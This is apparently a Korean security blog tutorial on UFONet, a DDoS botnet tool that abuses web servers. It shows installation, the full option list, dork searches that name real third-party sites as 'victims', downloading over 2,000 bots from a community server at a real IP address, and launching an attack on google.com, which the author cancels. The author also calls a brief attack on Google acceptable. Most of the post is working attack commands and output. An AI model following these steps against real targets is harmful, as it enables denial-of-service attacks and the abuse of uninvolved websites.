- UFOnet
좀비 PC를 이용하여 DDoS 공격을 테스트 할 수 있는 프로그램이다.
[주의] 실제로 절대 사용하지 말 것!!
- 설치 방법
https://sourceforge.net/projects/ufonet/?source=directory
sourceforge.net 에 들어가서 다운로드 한다.
(KaliLinux)
> 파일을 저장한다.
> Downloads 폴더에 저장되어 있을 것이다.
# mkdir -p /test1 && cd /test1
# mv ~/Downloads/ufonet-v0.9.zip .
# unzip ufonet-v0.9.zip
# cd ufonet ; ls
|
MANIFEST.in botnet core docs server setup.py ufonet |
|
- 사용법
# cd /test1/ufonet
# ./ufonet
|
=========================================================================== 888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88PY888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888 UFONet - DDoS Botnet via Web Abuse - by psy =========================================================================== Total bots: 5 = [ Z:1 + A:1 + D:1 + U:1 + R:1 ] =========================================================================== -> For HELP use: -h or --help -> For WEB interface use: --gui =========================================================================== |
|
# ./ufonet --help
|
Usage: ./ufonet [options] UFONet - DDoS Botnet via Web Abuse - by psy Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --update check for latest stable version --check-tor check to see if Tor is used properly --force-yes set 'YES' to all questions --gui run GUI (UFONet Web Interface) *Tools*: --crypter Encrypt/Decrypt messages using AES256+HMAC-SHA1 *Configure Request(s)*: --proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118') --user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default SPOOFED) --host=HOST Use another HTTP Host header (default NONE) --xforw Set your HTTP X-Forwarded-For with random IP values --xclient Set your HTTP X-Client-IP with random IP values --timeout=TIMEOUT Select your timeout (default 10) --retries=RETRIES Retries when the connection timeouts (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 5) --delay=DELAY Delay in seconds between each HTTP request (default 0) *Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=') --sd=DORKS Search from 'dorks' file (ex: --sd 'botnet/dorks.txt') --sn=NUM_RESULTS Set max number of results for engine (default 10) --se=ENGINE Search engine to use for 'dorking' (default bing) --sa Search massively using all search engines --auto-search Search automatically for 'zombies' (may take time!) *Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'botnet/zombies.txt') --attack-me Order 'zombies' to attack you (NAT required!) --test-rpc Update 'xml-rpc' reflectors status *Community*: --download-zombies Download 'zombies' from Community server --upload-zombies Upload your 'zombies' to Community server --blackhole Create a 'blackhole' to share your 'zombies' --up-to=UPIP Upload your 'zombies' to a 'blackhole' --down-from=DIP Download your 'zombies' from a 'blackhole' *Research Target*: -i INSPECT Search biggest file (ex: -i 'http(s)://target.com') -x ABDUCTION Examine webserver configuration (+CVE info) *Extra Attack(s)*: --db=DBSTRESS Set db stress input point (ex: --db 'search.php?q=') --loic=LOIC Start 'DoS' Web LOIC attack (ex: --loic 100) *Configure Attack(s)*: --no-head Disable status check: 'Is target up?' --no-aliens Disable 'aliens' web abuse --no-droids Disable 'droids' redirectors --no-ucavs Disable 'ucavs' checkers --no-rpcs Disable 'xml-rpcs' reflectors -r ROUNDS Set number of rounds (default 1) -b PLACE Set place to attack (ex: -b '/path/big.jpg') -a TARGET Start 'DDoS' attack (ex: -a 'http(s)://target.com') |
|
|
0========================================0 '' '----' '' || || .'_.- ( ) -._'. || * Class: UFONet -ViPR404- || .'.' |'..'| '.'. || || .-. .' /'--.__|____|__.--'\ '. .-. || * Type: Scout/Transporter || (O).)-| | \ | | / | |-(.(O) || || `-' '-'-._'-./ \.-'_.-'-' `-' || * Botnet (featured): || _ | | '-.________.-' | | _ || || .' _ | | | __ | | | _ '. || -Zombies: HTTP GET bots || / .' ''.| | / \ | |.'' '. \ || -Droids : HTTP GET (+params) bots || | |( )| '. || || .' |( )| | || -Aliens : HTTP POST bots || \ '._.' '. | \ / | .' '._.' / || -UCAVs : Web Abusing bots || '.__ ______'.|__'--'__|.'______ __.' || -X-RPCs : XML-RPC bots || .'_.-| |-._'. || || 0|======================================|0 =========================================================================== 888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888 UFONet - DDoS Botnet via Web Abuse - by psy =========================================================================== Searching for NEW 'zombies' (not present on your list) using: google ====================== [Error] - This search engine is not supported! Wanna try a different search engine (Y/n) y Search engines available: ------------------------- + bing + yahoo + yandex ------------------------- Ex: ufonet -s 'proxy.php?url=' --se 'bing' Bye! |
|
> 구글은 막아 놓은 것 같습니다.
# ./ufonet -s 'index.php?ur=' --se yahoo
|
0========================================0 '' '----' '' || || .'_.- ( ) -._'. || * Class: UFONet -ViPR404- || .'.' |'..'| '.'. || || .-. .' /'--.__|____|__.--'\ '. .-. || * Type: Scout/Transporter || (O).)-| | \ | | / | |-(.(O) || || `-' '-'-._'-./ \.-'_.-'-' `-' || * Botnet (featured): || _ | | '-.________.-' | | _ || || .' _ | | | __ | | | _ '. || -Zombies: HTTP GET bots || / .' ''.| | / \ | |.'' '. \ || -Droids : HTTP GET (+params) bots || | |( )| '. || || .' |( )| | || -Aliens : HTTP POST bots || \ '._.' '. | \ / | .' '._.' / || -UCAVs : Web Abusing bots || '.__ ______'.|__'--'__|.'______ __.' || -X-RPCs : XML-RPC bots || .'_.-| |-._'. || || 0|======================================|0 =========================================================================== 888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888 UFONet - DDoS Botnet via Web Abuse - by psy =========================================================================== Searching for NEW 'zombies' (not present on your list) using: yahoo ====================== +Victim found: http://www.atlasdedermatologieprofessionnelle.com/index.php/Urticaires_physiques/RK=2/RS=pPuZDr9DCGqQyRY4YCon2imD6j8-index.php?ur= ------------ +Victim found: http://videotheque.cnrs.fr/index.php?ur14action=doc&id_doc=502/RK=2/RS=TLdYrFPKCjoHyVh9tQlTohGzsj0-index.php?ur= ------------ +Victim found: http://fencebiryayincilik.com/index.php/ur//RK=2/RS=P5hykWCePfQGaQ_wB5vE_Jn.rYk-index.php?ur= ------------ +Victim found: http://old.admr.org/federations/index.php?urlasso=is-sur-tille.fede21/RK=2/RS=2kt1Rmgs0Ji7.rg9W9dOJ3ggf78-index.php?ur= ------------ +Victim found: https://style-ur.com/index.php?ur= ------------ +Victim found: https://urjkk.com/index.php?ur= ------------ ====================== +Possible Zombies: 6 ====================== Wanna check if they are valid zombies? (Y/n) y Are 'they' alive? :-) (HEAD Check): =================================== Trying: 6 --------------------- Zombie: style-ur.com Status: Ok [200] ---------- Zombie: urjkk.com Status: Ok [200] ---------- Zombie: fencebiryayincilik.com Status: Ok [200] ---------- Zombie: old.admr.org Status: Not Found [404] ---------- Zombie: www.atlasdedermatologieprofessionnelle.com Status: Ok [200] ---------- Zombie: videotheque.cnrs.fr Status: Ok [200] ---------- ================== OK: 5 Fail: 1 ================== ====================== Checking for payloads: ====================== Trying: 5 --------------------- Vector: https://style-ur.com/index.php?ur= Status: Not ready... ---------- Vector: http://fencebiryayincilik.com/index.php/ur//RK=2/RS=P5hykWCePfQGaQ_wB5vE_Jn.rYk-index.php?ur= Status: Not ready... ---------- Vector: https://urjkk.com/index.php?ur= Status: Not ready... ---------- Vector: http://videotheque.cnrs.fr/index.php?ur14action=doc&id_doc=502/RK=2/RS=TLdYrFPKCjoHyVh9tQlTohGzsj0-index.php?ur= Status: Not ready... ---------- Vector: http://www.atlasdedermatologieprofessionnelle.com/index.php/Urticaires_physiques/RK=2/RS=pPuZDr9DCGqQyRY4YCon2imD6j8-index.php?ur= Status: Not ready... ---------- ================== OK: 0 Fail: 5 ================== ================== Army of 'zombies' ================== ------------------ Total Army: 0 ------------------ [Info] - Not any zombie active! |
|
> 야후는 검색이 됩니다.
> 6개의 좀비 PC가 검색되고 1개 빼고 다 살아 있지만 페이로드 가능한 것은 하나도 없네요.
# ./ufonet --download-zombie ( 좀비 목록을 다운로드 받습니다. )
|
0========================================0 '' '----' '' || || .'_.- ( ) -._'. || * Class: UFONet -ViPR404- || .'.' |'..'| '.'. || || .-. .' /'--.__|____|__.--'\ '. .-. || * Type: Scout/Transporter || (O).)-| | \ | | / | |-(.(O) || || `-' '-'-._'-./ \.-'_.-'-' `-' || * Botnet (featured): || _ | | '-.________.-' | | _ || || .' _ | | | __ | | | _ '. || -Zombies: HTTP GET bots || / .' ''.| | / \ | |.'' '. \ || -Droids : HTTP GET (+params) bots || | |( )| '. || || .' |( )| | || -Aliens : HTTP POST bots || \ '._.' '. | \ / | .' '._.' / || -UCAVs : Web Abusing bots || '.__ ______'.|__'--'__|.'______ __.' || -X-RPCs : XML-RPC bots || .'_.-| |-._'. || || 0|======================================|0 =========================================================================== 888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888 UFONet - DDoS Botnet via Web Abuse - by psy =========================================================================== Downloading list of 'zombies' from server ... ====================== Trying 'blackhole': 176.28.23.46 Vortex: IS READY! ------------ [Info] - Zombies: 1228 [Info] - Droids : 48 [Info] - Aliens : 4 [Info] - UCAVs : 3 [Info] - X-RPCs : 822 [Info] - Congratulations!. Total downloaded: 2105 ------------ Wanna merge ONLY new 'troops' to your army (Y/n)y ------------------------- [Info] - Botnet updated! ;-) |
|
# ./ufonet -a http://www.google.com
|
0========================================0 '' '----' '' || || .'_.- ( ) -._'. || * Class: UFONet -ViPR404- || .'.' |'..'| '.'. || || .-. .' /'--.__|____|__.--'\ '. .-. || * Type: Scout/Transporter || (O).)-| | \ | | / | |-(.(O) || || `-' '-'-._'-./ \.-'_.-'-' `-' || * Botnet (featured): || _ | | '-.________.-' | | _ || || .' _ | | | __ | | | _ '. || -Zombies: HTTP GET bots || / .' ''.| | / \ | |.'' '. \ || -Droids : HTTP GET (+params) bots || | |( )| '. || || .' |( )| | || -Aliens : HTTP POST bots || \ '._.' '. | \ / | .' '._.' / || -UCAVs : Web Abusing bots || '.__ ______'.|__'--'__|.'______ __.' || -X-RPCs : XML-RPC bots || .'_.-| |-._'. || || 0|======================================|0 =========================================================================== 888 888 8888888888 .d88888b. 888b 888 888 888 888 888 d88P Y888b 8888b 888 888 888 888 888 888 888 88888b 888 888 888 888 8888888 888 888 888Y88b 888 .d88b. 888888 888 888 888 888 888 888 Y88b888 d8P Y8b 888 888 888 888 888 888 888 Y88888 88888888 888 Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888 UFONet - DDoS Botnet via Web Abuse - by psy =========================================================================== Attacking: http://www.google.com ======================================================= ===================== Round: 'Is target up?' ===================== [Info] From here: YES --------------------- [Info] From exterior: YES --------------------- [Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N) n Bye! |
|
> 다운 받은 좀비 PC로 공격작업을 합니다.
> DDoS 공격을 하지 않고 취소합니다. 구글은 워낙 사용자가 많아 공격을 하고 금방 끊어버리면 괜찮지만 네이버나 다음에 대에서는 실습을
하면 안됩니다.
> Ctrl+Z 로 멈추고 백그라운드로 넘긴 뒤 jobs 명령어로 확인하고 kill로 종료 시키면 됩니다.
- GUI
# ./ufonet --gui
> START 클릭
> 좀비PC를 찾아야하니 Botnet 먼저 클릭
> tui 로 설정 했던 것들이 나온다.
> list에 있는 것들을 모두 사용하고 명령어로 검색했듯이 yahoo를 선택하고 SEARCH 클릭한다.
> 스크롤을 내리면 명령어가 실행되는 것과 같이 실행된다.
> 공격은 url과 이미지를 선택하고 ATTACK을 클릭하면 된다. 일반적인 페이지는 공격해서는 안된다.
'Security > 정보 수집' 카테고리의 다른 글
| NORSE 사이트 (0) | 2017.12.26 |
|---|---|
| Metasploitable V2 Linux 취약성 ( samba ) (0) | 2017.11.15 |
| Metasploitable V2 Linux 취약점 ( UnealIRCd ) (0) | 2017.11.15 |
| Metasploitable V2 Linux 취약성 ( VSFTPD backdoor ) (0) | 2017.11.14 |
| Metasploitable V2 Linux 취약점 ( NFS 전체 공유 ) (0) | 2017.11.14 |
